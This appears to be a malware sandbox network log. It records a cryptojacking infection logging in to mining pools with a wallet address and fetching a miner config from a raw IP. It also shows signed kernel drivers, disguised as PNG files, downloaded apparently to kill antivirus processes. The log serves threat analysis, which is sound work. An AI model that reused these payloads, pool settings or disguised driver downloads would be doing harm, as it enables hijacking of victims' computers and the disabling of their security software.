May 29, 2024 14:25:27.063656092 CEST	154	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 34 41 46 46 71 35 6b 53 69 47 42 6f 5a 34 4e 4d 44 77 59 74 4e 31 38 6f 62 63 38 41 65 6d 53 33 33 44 42 4c 57 Data Ascii: {"id":1,"method":"login","params":{"login":"44AFFq5kSiGBoZ4NMDwYtN18obc8AemS33DBLWs3H7otXft3XjrpDtQGv7SqSsaBYBb98uNbr2VBBEt7f2wfn3RVGQBEP3A","pass":"x"}}
May 29, 2024 14:25:27.159842968 CEST	155	IN	HTTP/1.1 400 Bad Request Connection: close Content-Length: 11 content-type: text/plain; charset=utf-8 x-served-by: cache-nyc-kteb1890072 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49761	199.232.214.172	80	7332	C:\Users\user\Desktop\smartsscreen.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:27.179166079 CEST	142	OUT	Data Raw: 16 03 01 00 89 01 00 00 85 03 03 9b 6e 90 4f e8 42 74 75 7a 3d 5d c9 d4 1c e9 cb 63 2b 69 db a3 71 8a 60 77 4a 35 36 9d c5 16 89 00 00 20 cc a8 cc a9 c0 2f c0 30 c0 2b c0 2c c0 13 c0 09 c0 14 c0 0a 00 9c 00 9d 00 2f 00 35 c0 12 00 0a 01 00 00 3c Data Ascii: nOBtuz=]c+iq`wJ56 /0+,/5<
May 29, 2024 14:25:27.626066923 CEST	155	IN	HTTP/1.1 400 Bad Request Connection: close Content-Length: 11 content-type: text/plain; charset=utf-8 x-served-by: cache-nyc-kteb1890091 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
May 29, 2024 14:25:28.007927895 CEST	7	OUT	Data Raw: 15 03 01 00 02 02 16 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49763	111.90.158.40	80	4588	C:\Users\user\Desktop\curl.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:33.233838081 CEST	101	OUT	GET /config.json?t=1716985532 HTTP/1.1 User-Agent: curl/7.35.0 Host: 111.90.158.40 Accept: /
May 29, 2024 14:25:34.224801064 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 May 2024 20:26:41 GMT Content-Type: application/json Content-Length: 1250 Last-Modified: Thu, 28 Mar 2024 10:20:23 GMT Connection: keep-alive ETag: "66054467-4e2" Accept-Ranges: bytes Data Raw: 7b 0a 20 20 20 20 22 61 75 74 6f 73 61 76 65 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 22 62 61 63 6b 67 72 6f 75 6e 64 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 63 6f 6c 6f 72 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 72 61 6e 64 6f 6d 78 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 69 6e 69 74 22 3a 20 2d 31 2c 0a 20 20 20 20 20 20 20 20 22 69 6e 69 74 2d 61 76 78 32 22 3a 20 2d 31 2c 0a 20 20 20 20 20 20 20 20 22 6d 6f 64 65 22 3a 20 22 61 75 74 6f 22 2c 0a 20 20 20 20 20 20 20 20 22 31 67 62 2d 70 61 67 65 73 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 22 72 64 6d 73 72 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 22 77 72 6d 73 72 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 22 63 61 63 68 65 5f 71 6f 73 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 22 6e 75 6d 61 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 22 73 63 72 61 74 63 68 70 61 64 5f 70 72 65 66 65 74 63 68 5f 6d 6f 64 65 22 3a 20 31 0a 20 20 [TRUNCATED] Data Ascii: { "autosave": false, "background": true, "colors": true, "title": true, "randomx": { "init": -1, "init-avx2": -1, "mode": "auto", "1gb-pages": false, "rdmsr": true, "wrmsr": true, "cache_qos": false, "numa": true, "scratchpad_prefetch_mode": 1 }, "cpu": { "enabled": true, "huge-pages": true, "huge-pages-jit": false, "hw-aes": null, "priority": null, "memory-pool": false, "yield": true, "max-threads-hint": 50, "asm": true, "cn/0": false, "cn-lite/0": false }, "donate-level": 0, "donate-over-proxy": 0, "pools": [ { "url": "111.90.143.130:80" }, { "url": "93.95.228.47:80" } ], "print-time": 60, "health-print-time": 60, "dmi": true, "retries": 10, "retry-pause": 10, "dns": { "ipv
May 29, 2024 14:25:34.224823952 CEST	269	IN	Data Raw: 36 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 22 74 74 6c 22 3a 20 33 30 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 75 73 65 72 2d 61 67 65 6e 74 22 3a 20 22 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e Data Ascii: 6": false, "ttl": 30 }, "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36", "verbose": 0, "watch": true, "pause-on-battery": false, "p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49764	111.90.158.40	80	7124	C:\Users\user\Desktop\curl.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:36.232809067 CEST	105	OUT	GET /WinRing0x64.png?t=1716985534 HTTP/1.1 User-Agent: curl/7.35.0 Host: 111.90.158.40 Accept: /
May 29, 2024 14:25:37.211481094 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 May 2024 20:26:44 GMT Content-Type: image/png Content-Length: 8137 Last-Modified: Sun, 05 Nov 2023 20:13:44 GMT Connection: keep-alive ETag: "6547f778-1fc9" Accept-Ranges: bytes Data Raw: 4d 53 43 46 00 00 00 00 c9 1f 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 4c 00 00 00 01 00 01 00 d0 38 00 00 00 00 00 00 00 00 63 57 49 ad 20 00 57 69 6e 52 69 6e 67 30 78 36 34 2e 73 79 73 00 c3 75 ba bd 75 1f d0 38 43 4b ec 39 09 58 53 c7 d6 73 93 00 09 08 41 05 05 ab 18 14 71 0f 97 45 c5 9d 40 d0 1b 45 c1 80 3b 0a 21 24 90 12 02 24 17 15 77 08 6a e3 15 ab b4 6a b5 2e a8 75 ad 0b 6d 5d 40 d4 82 52 b7 ba d4 1d b5 7d 52 ed 13 10 ab e2 86 b8 e5 9d b9 89 82 68 97 f7 be ff 7b df fb bf 76 f8 e6 9e 75 ce 9c 33 67 ce bd 33 61 d8 b8 45 88 8b 10 e2 41 37 9b 11 2a 40 96 16 84 fe b8 95 43 77 6a bb cf 09 ed 12 9c f2 2c 20 c2 4e 79 46 25 6a 0c a2 54 7d 4a 82 5e 91 2c 52 2a 74 ba 14 5a 14 a7 12 e9 d3 75 22 8d 4e 24 0d 8f 14 25 a7 c4 ab c4 8e 8e f6 5e 56 1b 3d fa e8 5e a4 8d 47 3b eb 3b b1 73 06 c0 51 ab a6 ed a4 59 38 63 67 2a 0b 93 77 ea 59 98 66 a5 a7 5b e1 14 16 ca 35 ca 44 3c be b1 8f 11 a1 08 c5 cf b5 45 25 de 0c f5 9a 77 1f b5 43 0e 1c 3e 42 4d 80 b0 b7 f0 f8 11 f0 70 c6 [TRUNCATED] Data Ascii: MSCF,L8cWI WinRing0x64.sysuu8CK9XSsAqE@E;!$$wjj.um]@R}Rh{vu3g3aEA7@Cwj, NyF%jT}J^,RtZu"N$%^V=^G;;sQY8cgwYf[5D<E%wC>BMpaa`-lK,j">4@Q<#s-VQB&[MLZDXM',:5h2%!GZ;&N(TFb'.x;,nY.{ Li$eKcBJ`P9TVPXJCWP)D\|DzpM]/q\4vXcWWlJ(r\|0&]g1KXLY,`1\|(O^rT@y@1-G;}PlbaEpE,$s&MRx!6hop<IDA+7\~l]`K`'I@pNLw2LSa:Y,R"3fDT1xTssSB{_!~Xx7dlDPGpUd"!+MD5GdW+pM<ZeY#~acegH1=?-,?@8'2adx2#x2c_0%%U\|II%
May 29, 2024 14:25:37.211503029 CEST	1236	IN	Data Raw: 58 6e 27 dc 73 56 62 2c 6f 5b 52 6e 53 88 3d 97 3a 14 c3 4e e8 24 35 45 79 89 cc ae 4e 8e 08 75 3d 5c 5b f6 c1 b5 cc 9b b0 d1 ca ab 9e 80 0a 58 2c 02 7e 71 55 95 c5 27 36 fe a6 b4 07 78 85 93 54 9c fe 33 23 e1 dd ab 3a 0e 52 e1 5e 09 4f 7d af ea Data Ascii: Xn'sVb,o[RnS=:N$5EyNu=\[X,~qU'6xT3#:R^O} %U\|C>-}/w/OYMN+@[_r&`p0C/!gSei>7%M70iD:+z31rd(x^=9
May 29, 2024 14:25:37.211513996 CEST	448	IN	Data Raw: 32 14 8e 86 03 2d 83 e7 20 c0 71 3b c0 bb f7 0a db e3 40 b7 61 cf 86 16 38 d0 6a 87 07 7f 9c 46 b6 f7 73 f0 88 48 44 23 bd f5 5e 30 08 a0 16 6e 0c 32 a0 d4 70 8f 40 e8 33 56 87 44 01 70 5f f0 65 61 1c 7b 63 18 82 dc 81 1f 02 3a c9 f0 a7 02 7d 1a Data Ascii: 2- q;@a8jFsHD#^0n2p@3VDp_ea{c:}EDDKA`M]LRZD*;JEd@d.na02dH1hcx(R+hXw `(z]?fNB26^?m<e+j^;GRi}]u
May 29, 2024 14:25:37.211528063 CEST	1236	IN	Data Raw: d2 b3 81 4d 9e 8b 77 a2 e7 fa c5 f4 b9 35 29 f3 16 9f 59 23 ad 59 fb 30 64 d5 d5 bc 2c f7 38 32 8b 7b 80 cc e2 6c c8 e3 72 08 0e c7 81 bd a6 10 ae bd bc 3c 37 93 8e 6f 9c 25 6c c0 2d 25 eb 25 77 24 cf b6 39 27 38 d4 d7 9d 6c 89 09 fb e6 ce 83 b5 Data Ascii: Mw5)Y#Y0d,82{lr<7o%l-%%w$9'8l)q9$DI94wIV"$b>[!o-^do_8 dd'D",Ok24aq2NDDMFAJ}Vh$FN!v%l7B{NA#Qo
May 29, 2024 14:25:37.211539984 CEST	1236	IN	Data Raw: 87 a9 7c 4e 55 9f bd cb 94 45 83 f3 7b 27 49 d0 cc c7 43 0b 66 dd f4 b4 96 f4 72 32 73 e9 db 05 4c d8 92 42 4c 37 c7 b4 0d c9 05 40 b6 c1 0c 27 5e 0b 9e cb a8 ec 3b bb d3 36 54 28 cb ae 8d e0 5d 7a 76 eb 3e 25 97 9d 86 af 13 5b cf dd c8 2e 64 a7 Data Ascii: \|NUE{'ICfr2sLBL7@'^;6T(]zv>%[.d<<~qRJnn)gTfCW>!TOy_G UG_'gO;9K:zojO3/.=3;Ptg\\|9ON6YB;Vm5n.f
May 29, 2024 14:25:37.211550951 CEST	1236	IN	Data Raw: f5 22 e3 49 51 d8 b2 8b 67 bd c1 ca 1f 81 e4 61 dc dd 82 3a 6b cb 64 95 c2 47 f5 cf 9e 52 fa ca 73 e2 cc f1 10 e2 fb 56 17 9e 77 1f fc 34 6d cc bc 9f 1e 86 9c 09 4f 8e 3e 43 1f 14 fb 91 cd e5 b1 56 63 49 a4 8d 48 c8 1d 0e 7b 48 69 4b 40 6a 7d 31 Data Ascii: "IQga:kdGRsVw4mO>CVcIH{HiK@j}1Zt<te%cgrHcAe {I}8e48Q?ss~\|&po.tikV}],H{#M[UT\|`rer924i>U;aJ9`uWJXAuNu
May 29, 2024 14:25:37.211591005 CEST	1236	IN	Data Raw: 45 29 8f 89 b3 03 1e e7 89 73 a4 66 09 38 bc 3b 0e 6f 4f 70 a6 be 43 06 d8 bd 15 92 62 db fb d1 18 31 6b 0c 7e b3 04 46 1b 45 b3 26 34 3e a8 02 2a 8a 4a 70 35 00 50 81 6f f2 e1 53 13 be d9 fc df a5 34 7f c7 84 21 f6 17 c9 91 5d d7 9f 99 85 5d 5c Data Ascii: E)sf8;oOpCb1k~FE&4>Jp5PoS4!]]\{ 2m VN<'v[h[@n&24JE=_4[05i\|O@IygjX#q&M9Jd.dG#C/)~kyX_
May 29, 2024 14:25:37.211601973 CEST	328	IN	Data Raw: 56 77 f9 f4 f2 5b fb bd 0f f1 a2 44 9d b6 8e 6d 65 ec 62 ff 58 d2 54 15 56 80 1f 08 d8 c1 fe db 81 f3 6e 14 ee 9b 07 73 49 bf 14 3d 79 78 17 f9 d2 99 f8 da 12 4d 59 0c e8 d5 b3 66 b3 cd d2 9e 59 1c 92 52 b1 d0 36 cb 5c 3d 90 bb a4 52 21 97 5f 7f Data Ascii: Vw[DmebXTVnsI=yxMYfYR6\=R!_:4#ZVt2]?5U\|]=F8zH!E`$`^oX(K'Z1NMQ(IUWbkx8XrF8t "({_P
May 29, 2024 14:25:37.300338984 CEST	194	IN	Data Raw: 46 0d 4c e2 73 0b 3a 10 51 f5 86 4e 2f 77 3a b6 7a d5 32 20 c2 2a 2b a6 09 1d 4f d6 dc 40 97 44 ac 73 5b 2f 1c 1f f5 27 85 29 ef 38 a5 a2 37 b9 78 62 21 1e 45 ee dc c8 33 31 98 54 e3 19 7d 2f 66 93 e7 3c 16 ae 90 f1 aa 12 3d d6 94 31 f9 7b 4b 51 Data Ascii: FLs:QN/w:z2 *+O@Ds[/')87xb!E31T}/f<=1{KQ5eY7)KB3G;wFJH'"[xWx;f#J#bu#%r^dwO``J<x^r+t!?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49765	111.90.143.130	80	3616	C:\Users\user\Desktop\taskhostw.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:42.303961992 CEST	512	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 78 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49766	111.90.158.40	80	7680	C:\Users\user\Desktop\curl.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:47.768125057 CEST	105	OUT	GET /drives/kill.png?t=1716985546 HTTP/1.1 User-Agent: curl/7.35.0 Host: 111.90.158.40 Accept: /
May 29, 2024 14:25:48.739342928 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 May 2024 20:26:55 GMT Content-Type: image/png Content-Length: 114419 Last-Modified: Thu, 25 Jan 2024 20:58:39 GMT Connection: keep-alive ETag: "65b2cb7f-1bef3" Accept-Ranges: bytes Data Raw: 4d 53 43 46 00 00 00 00 f3 be 01 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 49 00 00 00 07 00 01 00 98 2c 03 00 00 00 00 00 00 00 31 58 39 79 20 00 61 73 77 41 72 50 6f 74 2e 73 79 73 00 c1 47 ee 4a 29 4d 00 80 43 4b d5 bd 79 7c 53 55 da 00 9c b5 0d d0 72 83 34 52 94 a5 40 d0 6a 11 2b 05 6d 4d 19 72 69 42 4f a6 09 ad 40 a1 2a 48 1d a4 80 a0 62 9b 00 0a 4a 6b 5a 24 1c af fa ba e2 ee ec 3a cb ab 33 3a b4 14 85 96 4a 17 64 47 01 45 05 f7 db 89 0e 55 b1 2d b2 dc ef 79 9e 73 93 b6 c2 cc bc bf ef f7 fd f3 f9 b3 24 f7 dc b3 3c e7 39 cf 79 f6 73 12 b8 e9 51 83 d9 60 30 58 e0 4f d3 0c 86 3a 83 f8 cf 6d f8 ef ff a9 f0 37 70 64 fd 40 c3 9b fd 76 8f aa 33 fa 77 8f 9a b5 78 49 45 da f2 f2 bb 16 95 df 7a 47 da 82 5b ef bc f3 ae 60 da af 16 a6 95 87 ee 4c 5b 72 67 9a a7 70 66 da 1d 77 dd b6 70 7c 72 72 7f a7 de c7 83 cf 26 d7 34 9d 5e 70 28 f6 b7 f1 f1 5f 1d 6e a0 ef bf 3a b4 9c 9e 17 1e 7e 87 3e 4b 0f 37 d3 e7 a2 c3 3b e0 73 f5 86 52 fd 73 e9 e1 dd f4 f9 fc a1 ed f4 79 eb 61 fc 9c [TRUNCATED] Data Ascii: MSCF,I,1X9y aswArPot.sysGJ)MCKy\|SUr4R@j+mMriBO@HbJkZ$:3:JdGEU-ys$<9ysQ`0XO:m7pd@v3wxIEzG[`L[rgpfwp\|rr&4^p(_n:~>K7;sRsyadb/k`mp!hKsMM0j0/~W/`JgNT5}Q'F6R/a2jxzd>d{Ml?>pU>@W/`X<[s>/uD~^EE#+`M?7Ghhf;-PS/\vTD#q[EN[/eVie9)rmLe9)iD]k4j+TYj2O-h&oU44)~'wX$qHExy\,@gioFb1T;T=k:Y% kup<5Pko_iJhGrLi_c24o@\ER?\K)8F$=>\|UZETk+w_J1Ec?`b<,c_#Kh.oaZ+Si[2MDOy?!24dy2}=w`O^5G
May 29, 2024 14:25:48.739407063 CEST	1236	IN	Data Raw: 4e d7 76 c8 ae 7f ad 38 16 bd 84 37 62 15 5a 64 bd ca 73 a2 4a 06 e3 ef aa c7 ce c2 ea f0 23 38 6e cd d3 e7 34 2d 0b d6 6c ae 73 15 2c 54 9a 3c 5f be 45 9e 27 cf 9d 7f cb bc a6 18 70 41 33 8b 64 33 de 14 fd 60 d7 2e b1 8e 7d d6 50 5f 3f c6 87 1f Data Ascii: Nv87bZdsJ#8n4-ls,T<_E'pA3d3`.}P_?{uT>D(_;aWFW;\;C#)e,tcb-LYIP27P>WPq4e02os.i-+AlMXIsd#8'J
May 29, 2024 14:25:48.739415884 CEST	1236	IN	Data Raw: c4 6d 38 48 74 84 9f b7 f8 f8 21 ec a7 54 fd ca 46 bc 91 1f f4 21 f7 5b 0c 95 dd d5 9d c8 fd a0 e9 9f 2e d3 b1 fc 0c 40 cb 5b a2 56 dc 83 71 c1 ea 16 ac 17 69 ca 1f 61 7d f0 34 93 f4 20 c1 c3 4a b2 34 2f a0 6b d4 aa 8d 02 01 1e 5e 9a 2a f3 f7 34 Data Ascii: m8Ht!TF![.@[Vqia}4 J4/k^*4GDA"Q5V[zg~a#mjFw(o2z;yORZfR}]w{[ Ra7\|F'&0dh"@}`FWs^O87(j?6p-n<-rD8
May 29, 2024 14:25:48.739425898 CEST	1236	IN	Data Raw: 01 01 bf 77 ce 88 84 8b b4 18 17 1e f3 e2 b6 46 5f 1a 66 fc 1b e4 63 84 32 af 1d d6 b2 8e 85 17 ee 43 dc b6 0a 54 13 0d d5 57 c2 1a 02 15 1d 81 55 7d 1d 28 26 53 a7 12 b5 c5 7b 1c a9 07 b1 9b 48 82 e1 48 9a ce 8f ae f4 73 6f 1a 60 3a 1d 80 7c 1d Data Ascii: wF_fc2CTWU}(&S{HHso`:\|\us%,^]xy+bUvpH1\|K_iuL"& !'CbHp q^X'ew5yIQIYGIont/[^[(_<Px_Ui3
May 29, 2024 14:25:48.739434958 CEST	896	IN	Data Raw: bf 28 73 7e 53 0f 5c 4b 09 2e dd a7 50 0a 9b e4 92 1b e3 9b a4 04 28 7f 1b 09 79 94 41 a8 3f 6a 8e 31 40 82 7c 66 11 59 03 05 4c 4d c7 7d c1 f9 62 52 8f ba e5 ad a4 35 00 75 f5 93 f9 21 b0 8b a1 32 8b 6c 11 6f b7 a8 14 6f d0 82 a0 56 bc 41 c6 80 Data Ascii: (s~S\K.P(yA?j1@\|fYLM}bR5u!2looVAzGC2yuMm0?sa<'cZk=DHjx=vYf>(bf#3i$z14[X@yEs-lRcu(W
May 29, 2024 14:25:48.739444017 CEST	1236	IN	Data Raw: b2 05 49 eb 59 e3 29 0b ca c2 48 d2 04 1f 18 e2 26 a6 4c 4f 61 e6 9d 62 1d 95 e4 6c a4 21 c5 fa 3f dd f1 65 3c 04 3d 73 40 04 2e 96 5b 6b 6a bf 1a c3 c4 bc 39 6a d1 75 db d2 de 4b a5 f3 fe 34 f4 a9 c7 75 24 94 4b 5d d6 d9 ff 03 30 13 a6 3f 94 aa Data Ascii: IY)H&LOabl!?e<=s@.[kj9juK4u$K]0?&Hd'vf&{[R!HNLwWY(wE9hj][HD`+.v.f4U"}tz87x&ox./Swei~e+FP
May 29, 2024 14:25:48.739454031 CEST	1236	IN	Data Raw: 65 7d 39 22 a4 76 70 b0 1a 48 35 fe bc 47 6b 55 44 a4 2c 06 67 fb 30 ee bb 47 2d 1d f9 f3 4a 40 cc 33 97 e9 d9 1b dc 10 59 37 31 01 05 ab e3 ae 62 2c 3b 10 1c ce d7 65 27 50 88 7b b0 87 37 f8 1a 8f 9b 99 f2 70 2e 94 a8 57 45 8d 86 2e eb 48 1c 01 Data Ascii: e}9"vpH5GkUD,g0G-J@3Y71b,;e'P{7p.WE.H>'R=lE4r&0D:KnT',m?{H]"QNX=$4T#^'/oQbY[>:#`s<lOHr7x*yW-"-$Dx=f6
May 29, 2024 14:25:48.739464998 CEST	1236	IN	Data Raw: dc 1c 33 62 59 25 14 dd 68 ea a5 80 ae f8 2a 6e 4a ed 56 47 7d a0 63 d1 49 6a ed 2c 94 3e 5f 31 fe 96 13 17 be cc 55 9e d0 fe a8 ae 8c 2a 49 35 a3 c8 ad dd 0a 18 da 89 48 a9 39 82 b8 94 aa e7 53 8d 69 49 bf 54 26 a6 fb cc 2d 55 bf 40 f4 30 90 29 Data Ascii: 3bY%hnJVG}cIj,>_1UI5H9SiIT&-U@0)[,;$c-P\|Dnj"8ze'H8J+-.g[u^3WT0^hQ[S% W]*g=@>el_5jZG0n]j
May 29, 2024 14:25:48.739475012 CEST	1236	IN	Data Raw: c2 ae 3b bc da 96 10 bc 9e dc 38 39 79 49 c1 cc 07 c1 00 d9 8a 27 0a 2b bb 10 35 09 f0 de 12 bc 84 29 75 95 1d 3f 99 e0 99 b9 5a d6 82 35 07 70 e0 9b d0 b7 17 3c 83 72 9e 2e 23 68 15 25 97 60 88 43 75 92 61 4c d9 dc 92 80 68 d5 8f de 4d 9c 1a ea Data Ascii: ;89yI'+5)u?Z5p<r.#h%`CuaLhMnfsIzOS4*f)c-70J+4C'eTsT["E7DC[sa4wNc~vwFbZQr;M=Q7\|~/tEW}m;%t#
May 29, 2024 14:25:48.739487886 CEST	328	IN	Data Raw: f7 f1 53 01 14 33 5e da 90 c2 e7 42 a7 9e 27 92 93 bf 4d 73 ac ed 10 fc 71 8c 51 3f 3f 7b a7 5e 70 11 05 b3 df 24 ef 49 d6 d1 9c 11 d2 ba 2e dd ee 5f 1c 3e 3d 45 0a b7 13 a9 5c cd c2 5f 76 90 3d 7a ad de ae 89 94 b6 35 ce 52 a8 3b cf 26 55 bf a6 Data Ascii: S3^B'MsqQ??{^p$I._>=E\_v=z5R;&Ug~,$>nGyCs3da)_:Ba@Y/)73h"ygG3E\E7s~r`0ht;X)K 2niM>v:rR}c\yL_P^Q%)g=
May 29, 2024 14:25:48.744461060 CEST	1236	IN	Data Raw: 2f f3 73 ab e3 6e 74 64 4e be 96 0e da 3b be be 0b 53 16 d6 c4 b2 42 be c1 44 2f 3e fc d4 72 fd b4 fc 39 5c eb 9c ab 6e 25 38 be 13 0f 7e 7a f8 02 99 94 e2 45 27 20 20 75 1f 34 50 67 ee 35 92 93 b8 9a 44 cd 59 7f ce 52 bb b4 ee 2d 7a d8 cd b6 4e Data Ascii: /sntdN;SBD/>r9\n%8~zE' u4Pg5DYR-zNU0L,VX`I`"Z 5Y0OQ:jj-\|/s7F~}>wltDm'0kT?A)]h@A\|9w,JPWx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49767	111.90.158.40	80	928	C:\Users\user\Desktop\curl.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 14:25:52.694067001 CEST	107	OUT	GET /drives/delete.png?t=1716985552 HTTP/1.1 User-Agent: curl/7.35.0 Host: 111.90.158.40 Accept: /
May 29, 2024 14:25:54.244415045 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 May 2024 20:27:01 GMT Content-Type: image/png Content-Length: 18994 Last-Modified: Thu, 25 Jan 2024 20:58:36 GMT Connection: keep-alive ETag: "65b2cb7c-4a32" Accept-Ranges: bytes Data Raw: 4d 53 43 46 00 00 00 00 32 4a 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 4e 00 00 00 02 00 01 00 d8 8e 00 00 00 00 00 00 00 00 3e 43 bd 78 21 00 49 4f 62 69 74 55 6e 6c 6f 63 6b 65 72 2e 73 79 73 00 d8 4c f2 01 0d 40 00 80 43 4b ed bd 09 40 53 d7 ba 28 bc 33 00 61 72 23 10 05 c7 a8 b1 52 51 1a 86 2a 18 5b 09 24 ba a3 41 11 70 38 8e 20 24 42 45 c0 64 47 40 b1 15 41 6b ba 4d 8f 6d 3d ad ed e9 60 67 db e3 e9 e8 a9 53 ad 28 8a 58 27 b4 ad a5 5a 5b 6b a7 20 ad a5 93 43 6b cd fb be b5 76 06 10 db 9e f7 bf ff de 77 df bd d1 9d b5 f7 1a bf 79 7d df 5a 6b 87 ac 59 eb 19 19 c3 30 72 b8 dc 6e 86 d9 ce d0 4f 3a f3 c7 9f 56 b8 7a 0c dc d9 83 d9 1a 7c 74 d0 76 89 e9 e8 a0 bc e2 12 9b aa c2 5a be d0 5a b0 58 55 58 50 56 56 ce ab 16 98 55 56 7b 99 aa a4 4c a5 9f 92 ab 5a 5c 5e 64 4e 08 0f 0f 51 8b 7d a4 8d fe f1 d7 15 d3 9f d8 ec bb 1e df 3c 09 52 3e a1 c7 e6 bb 49 aa 10 d3 01 9b ab 48 1a 2d 3e 07 6f ae 21 69 18 49 73 4a 0a 8b b1 bd 07 b6 6c 03 c3 14 ad 09 62 5e cf 31 e4 78 f2 3a [TRUNCATED] Data Ascii: MSCF2J,N>Cx!IObitUnlocker.sysL@CK@S(3ar#RQ[$Ap8 $BEdG@AkMm=`gS(X'Z[k Ckvwy}ZkY0rnO:Vz\|tvZZXUXPVVUV{LZ\^dNQ}<R>IH->o!iIsJlb^1x:L4afC$+_x'x/e@x\Bt Q"}o"\|ea8ya0@60L?A{87WQ1Lq/`O@aw2%jLsCZ^s'!/p-Vi]7`5CE"_"\|e7wH9F$I8.4zvN k,4IXXi0.Mkp0[a`5OlFhLap='OsAPQF!x<sk'{4~8 +Y>E[x>&ccEHlN>?J<Zzus\|Tpr-wbVs\|:9Pt3:3c W9xdZ;4t9IV!B(NXFp+7C^XQ'YX7hRC{r p{{h=)j00w0HWii:<1s\[Fsal1F>E5$X\|p@tq
May 29, 2024 14:25:54.244462967 CEST	224	IN	Data Raw: c1 30 f4 c1 89 74 e8 38 b7 f2 b9 b9 58 71 92 82 5b 7d 88 0f 74 2b 9f c7 c7 ba fd 9a d9 9e 1e a1 b7 38 ae 6e 41 2a 53 b7 40 03 15 df 4d 3e e9 56 ae 85 4a c9 0d 50 2d ae 0b 4f 73 23 72 a7 cf d0 e5 e9 a6 e9 a6 eb 66 70 b5 df 10 1a 0a bf 24 9f b1 80 Data Ascii: 0t8Xq[}t+8nAS@M>VJP-Os#rfp$jNcn\1w2'sbnJqsO1`dj3l\|`OU9)ke(UzGou1&aaI9[3AVu28low.6N8ic
May 29, 2024 14:25:54.244534016 CEST	1236	IN	Data Raw: 2c 69 31 7c 14 57 d7 20 a5 b9 ee 63 a4 56 fb e7 42 23 14 eb 58 fd 41 4e fb 1e cf 6a 1b 6b 14 5c 3c 94 85 b4 cb 38 47 1f 6d e3 0a 05 e6 e3 bd 63 82 46 db c8 ae 0b 90 21 e9 81 02 28 41 2e a4 89 ac 01 71 4d b2 68 1b ed c1 88 5c db 79 30 83 ec b6 96 Data Ascii: ,i1\|W cVB#XANjk\<8GmcF!(A.qMh\y0hu8JP.rjQxqv#<i5(j"wp$Lho Vo&jJ>f^hzyDV1-~;!B@83E:g#:9LD>@d0F\|p
May 29, 2024 14:25:54.244637012 CEST	1236	IN	Data Raw: d1 f1 d2 cd f1 f9 54 dd c2 0e ce 15 3a cd 2a 13 b4 cd d7 ed 41 d0 74 42 9b 4e e8 30 09 e7 01 17 9d f0 69 d6 ea 6f f9 00 5d 9d 19 71 38 c4 d6 37 41 95 ed 68 8c c1 e4 b1 ab 10 17 d7 9b 69 5e 2c e6 e8 28 16 a7 01 b1 ba a3 8a f4 4b 07 e4 7c 74 16 80 Data Ascii: T:*AtBN0io]q87Ahi^,(K\|t; Z+RSn0nnOVo\WT_J#neR.ND"v++0GhV7H>J">e7\|2pnh8)V;7O9_M>[#v
